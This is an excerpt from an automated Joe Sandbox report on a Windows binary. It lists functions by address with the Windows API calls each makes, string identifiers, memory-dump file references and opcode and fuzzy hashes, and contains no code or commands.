                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 1536045017-1403004172
                                    • Opcode ID: a672b103fe712274477d12a503cb82024532898e7bdb269d64d2914a77ee8b0e
                                    • Instruction ID: 73e6018414c56c261f96d39b87af38fee6d9383d46f587d33314806817093306
                                    • Opcode Fuzzy Hash: a672b103fe712274477d12a503cb82024532898e7bdb269d64d2914a77ee8b0e
                                    • Instruction Fuzzy Hash: BE21B075A00108BBDF10ABA4CC85AFEBB74FB48300F100216F951972A1DA758919EB21
                                    Function 008D9163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetParent.USER32 ref: 008D916F
                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 008D9184
                                    • _wcscmp.LIBCMT ref: 008D9196
                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 008D9211
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ClassMessageNameParentSend_wcscmp
                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                    • API String ID: 1704125052-3381328864
                                    • Opcode ID: a6989115e358bffdd968ddce3f420c244f6a5cec52c735e49d09b250f72b6e74
                                    • Instruction ID: 57e202f85c07e651ae0928027d805be1dad96e949a762dfd3c840953c86877c3
                                    • Opcode Fuzzy Hash: a6989115e358bffdd968ddce3f420c244f6a5cec52c735e49d09b250f72b6e74
                                    • Instruction Fuzzy Hash: E6113A7624C30BB9FA302628DC06EA7779CFB12324F200267F910E19D2FEA1A8616951
                                    Function 008F88AB Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 008F88D7
                                    • CoInitialize.OLE32(00000000), ref: 008F8904
                                    • CoUninitialize.COMBASE ref: 008F890E
                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 008F8A0E
                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 008F8B3B
                                    • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002,?,00000001,00912C0C), ref: 008F8B6F
                                    • CoGetObject.OLE32(?,00000000,00912C0C,?), ref: 008F8B92
                                    • SetErrorMode.KERNEL32(00000000), ref: 008F8BA5
                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 008F8C25
                                    • VariantClear.OLEAUT32(?), ref: 008F8C35
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                    • String ID:
                                    • API String ID: 2395222682-0
                                    • Opcode ID: dd38d30a2642019df452f16dd04d18a03b27a6e958107ebd5fa810f682a2142a
                                    • Instruction ID: 3b2b74716df53bf5d0014b493ef7d9a85a208201f41c84cb602873773bab852b
                                    • Opcode Fuzzy Hash: dd38d30a2642019df452f16dd04d18a03b27a6e958107ebd5fa810f682a2142a
                                    • Instruction Fuzzy Hash: E3C102B16083099FC700EF68C88496AB7E9FF89748F00495DFA8ADB251DB71ED05CB52
                                    Function 008E7990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                                    Download Yara Rule
                                    APIs
                                    • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 008E7A6C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ArraySafeVartype
                                    • String ID:
                                    • API String ID: 1725837607-0
                                    • Opcode ID: d1b2572c4abb92430ac203420eadfc302e8ac6996ebe14c9efacdab29df82a87
                                    • Instruction ID: 4cae241cfe73e8f0844cf10bcd5266ea575e484b71fd2854f3aed7c62509106e
                                    • Opcode Fuzzy Hash: d1b2572c4abb92430ac203420eadfc302e8ac6996ebe14c9efacdab29df82a87
                                    • Instruction Fuzzy Hash: 60B1F67190825A9FDB10DFA9C884BBEB7F8FF4A324F240429EA11E7251D734E941CB91
                                    Function 008E11CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentThreadId.KERNEL32 ref: 008E11F0
                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,008E0268,?,00000001), ref: 008E1204
                                    • GetWindowThreadProcessId.USER32(00000000), ref: 008E120B
                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,008E0268,?,00000001), ref: 008E121A
                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 008E122C
                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,008E0268,?,00000001), ref: 008E1245
                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,008E0268,?,00000001), ref: 008E1257
                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,008E0268,?,00000001), ref: 008E129C
                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,008E0268,?,00000001), ref: 008E12B1
                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,008E0268,?,00000001), ref: 008E12BC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                    • String ID:
                                    • API String ID: 2156557900-0
                                    • Opcode ID: 7afae62cd9d76ef4d30d1dcccc73278eeb515f85edf78579c170b02c4f964a90
                                    • Instruction ID: 9aa906932198c64c3d17d6c68bc195d01b1ef1c1256a0c016d3e0c90ddab7571
                                    • Opcode Fuzzy Hash: 7afae62cd9d76ef4d30d1dcccc73278eeb515f85edf78579c170b02c4f964a90
                                    • Instruction Fuzzy Hash: 8D31ACB9628208AFDF20DF55EC88FA937A9FB57715F104165FA00C71A0D7709E44AB61
                                    Function 0088FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                    Download Yara Rule
                                    APIs
                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0088FAA6
                                    • OleUninitialize.OLE32(?,00000000), ref: 0088FB45
                                    • UnregisterHotKey.USER32(?), ref: 0088FC9C
                                    • DestroyWindow.USER32(?), ref: 008C45D6
                                    • FreeLibrary.KERNEL32(?), ref: 008C463B
                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 008C4668
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                    • String ID: close all
                                    • API String ID: 469580280-3243417748
                                    • Opcode ID: c3a1885d6d3e9fec1bae348e5f3059e4a749d80aa75f3b7ee7766a9856f9156c
                                    • Instruction ID: 5b921a0f63454d273fa223c1ee8133de51d4fe5e6b4597179a2b9027c88d837e
                                    • Opcode Fuzzy Hash: c3a1885d6d3e9fec1bae348e5f3059e4a749d80aa75f3b7ee7766a9856f9156c
                                    • Instruction Fuzzy Hash: C0A147303012268FDB29EB18C9A4F69B764FF15714F1442ADE90AEB262DB30ED56CF51
                                    Function 008DA068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                    Download Yara Rule
                                    APIs
                                    • EnumChildWindows.USER32(?,008DA439), ref: 008DA377
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ChildEnumWindows
                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                    • API String ID: 3555792229-1603158881
                                    • Opcode ID: 46ef15ae8e55e79ebb7d1901454e701ed695b0355635706c3eb13f0133d8c5e2
                                    • Instruction ID: 915b6bf8bb6ad2f5f227f69110a2eebca4f63cd09ed449706b423f0c2d9c0ef9
                                    • Opcode Fuzzy Hash: 46ef15ae8e55e79ebb7d1901454e701ed695b0355635706c3eb13f0133d8c5e2
                                    • Instruction Fuzzy Hash: 2991B630900605AADB1CEFA4C441BEDFBB5FF05314F64821AE45AE7341DF31AA99DB92
                                    Function 00882E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SetWindowLongW.USER32(?,000000EB), ref: 00882EAE
                                      • Part of subcall function 00881DB3: GetClientRect.USER32(?,?), ref: 00881DDC
                                      • Part of subcall function 00881DB3: GetWindowRect.USER32(?,?), ref: 00881E1D
                                      • Part of subcall function 00881DB3: ScreenToClient.USER32(?,?), ref: 00881E45
                                    • GetDC.USER32 ref: 008BCD32
                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 008BCD45
                                    • SelectObject.GDI32(00000000,00000000), ref: 008BCD53
                                    • SelectObject.GDI32(00000000,00000000), ref: 008BCD68
                                    • ReleaseDC.USER32(?,00000000), ref: 008BCD70
                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 008BCDFB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                    • String ID: U
                                    • API String ID: 4009187628-3372436214
                                    • Opcode ID: c00bc7382754fef83fbca39360f538ed3a2fdf3ab67feca2938d16615b6ad9f5
                                    • Instruction ID: 96a823d29119b7a776833d5914277834699c9cbeae3a6a773cc5729beb874c72
                                    • Opcode Fuzzy Hash: c00bc7382754fef83fbca39360f538ed3a2fdf3ab67feca2938d16615b6ad9f5
                                    • Instruction Fuzzy Hash: 4671DC35500209EFCF219F64C894AEA7FB5FF49324F18427AED55DA2A6C7318C81EB60
                                    Function 008F1A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008F1A50
                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 008F1A7C
                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 008F1ABE
                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 008F1AD3
                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008F1AE0
                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 008F1B10
                                    • InternetCloseHandle.WININET(00000000), ref: 008F1B57
                                      • Part of subcall function 008F2483: GetLastError.KERNEL32(?,?,008F1817,00000000,00000000,00000001), ref: 008F2498
                                      • Part of subcall function 008F2483: SetEvent.KERNEL32(?,?,008F1817,00000000,00000000,00000001), ref: 008F24AD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                    • String ID:
                                    • API String ID: 2603140658-3916222277
                                    • Opcode ID: aa05f79c57a8a318e9b30ed35f81abfd610e06d37428cdb2135e22eb13e16ae0
                                    • Instruction ID: 26bdf3cea8d82e169e7bf87b5bf0f45666414ad3058faed7f18efa6716fc6522
                                    • Opcode Fuzzy Hash: aa05f79c57a8a318e9b30ed35f81abfd610e06d37428cdb2135e22eb13e16ae0
                                    • Instruction Fuzzy Hash: 40417BB1505218FEEB118F60CC99FBA7BACFB08354F00412AFA05DA141E7B09E449BA1
                                    Function 008F8C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0090F910), ref: 008F8D28
                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0090F910), ref: 008F8D5C
                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 008F8ED6
                                    • SysFreeString.OLEAUT32(?), ref: 008F8F00
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                    • String ID:
                                    • API String ID: 560350794-0
                                    • Opcode ID: 23acb6788037940a7c94625a0adcd33b2eceb4e94a7339ea98bdb4438b502ee1
                                    • Instruction ID: d6fed224b27382a2b37d4263499c2d496f2121651a16977f2f76ec0332c532f3
                                    • Opcode Fuzzy Hash: 23acb6788037940a7c94625a0adcd33b2eceb4e94a7339ea98bdb4438b502ee1
                                    • Instruction Fuzzy Hash: 09F10571A00209EFCB14DFA4C884EBEB7B9FF89314F148498EA55EB251DB31AE45CB51
                                    Function 008FF694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 008FF6B5
                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 008FF848
                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 008FF86C
                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 008FF8AC
                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 008FF8CE
                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 008FFA4A
                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 008FFA7C
                                    • CloseHandle.KERNEL32(?), ref: 008FFAAB
                                    • CloseHandle.KERNEL32(?), ref: 008FFB22
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                    • String ID:
                                    • API String ID: 4090791747-0
                                    • Opcode ID: 089e9ec5df5f2aa2fd43b6387663f63cf9b4391d4cbcb8bac695feebe955aba0
                                    • Instruction ID: fd4a93490d8c2bea269de3ce9ef8b67e2186dcb64fb4b26a50335bdcb55a113c
                                    • Opcode Fuzzy Hash: 089e9ec5df5f2aa2fd43b6387663f63cf9b4391d4cbcb8bac695feebe955aba0
                                    • Instruction Fuzzy Hash: A0E1AE312042559FCB14EF38C891A6ABBE1FF85354F18856DFA99CB2A2DB70DC41CB52
                                    Function 0088201B Relevance: 13.7, APIs: 9, Instructions: 170timeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00881B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00882036,?,00000000,?,?,?,?,008816CB,00000000,?), ref: 00881B9A
                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 008820D3
                                    • KillTimer.USER32(-00000001,?,?,?,?,008816CB,00000000,?,?,00881AE2,?,?), ref: 0088216E
                                    • DestroyAcceleratorTable.USER32(00000000), ref: 008BBCA6
                                    • DeleteObject.GDI32(00000000), ref: 008BBD1C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                    • String ID:
                                    • API String ID: 2402799130-0
                                    • Opcode ID: a63f17b4ddf2a3bff9d8a862e5f0abf87a2f31f04aef85746f161df046dd838c
                                    • Instruction ID: eef0d4c45add6ead09c89cfaf3f6d61a5d4742c6dfc61b8a4e22cbfcce084888
                                    • Opcode Fuzzy Hash: a63f17b4ddf2a3bff9d8a862e5f0abf87a2f31f04aef85746f161df046dd838c
                                    • Instruction Fuzzy Hash: 2F61DE39124A04DFCB35AF54D958B29B7F1FF41316F208428E042CBA71CBB4A881EF91
                                    Function 008E4CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 008E466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,008E3697,?), ref: 008E468B
                                      • Part of subcall function 008E466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,008E3697,?), ref: 008E46A4
                                      • Part of subcall function 008E4A31: GetFileAttributesW.KERNEL32(?,008E370B), ref: 008E4A32
                                    • lstrcmpiW.KERNEL32(?,?), ref: 008E4D40
                                    • _wcscmp.LIBCMT ref: 008E4D5A
                                    • MoveFileW.KERNEL32(?,?), ref: 008E4D75
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                    • String ID:
                                    • API String ID: 793581249-0
                                    • Opcode ID: c2c056eba52bc640aab4a856f03efde710ed99847c0a48e6af33d35bfe58fc1c
                                    • Instruction ID: 14a3dba870b75ffba9c1178d3be92c3dc05517866aad7aa30d5e0ad4e4dfb193
                                    • Opcode Fuzzy Hash: c2c056eba52bc640aab4a856f03efde710ed99847c0a48e6af33d35bfe58fc1c
                                    • Instruction Fuzzy Hash: 075151B21083859BD624EB64DC819DB73ECFF86350F00192EF589D3152EE70A688C766
                                    Function 00908645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                    Download Yara Rule
                                    APIs
                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 009086FF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
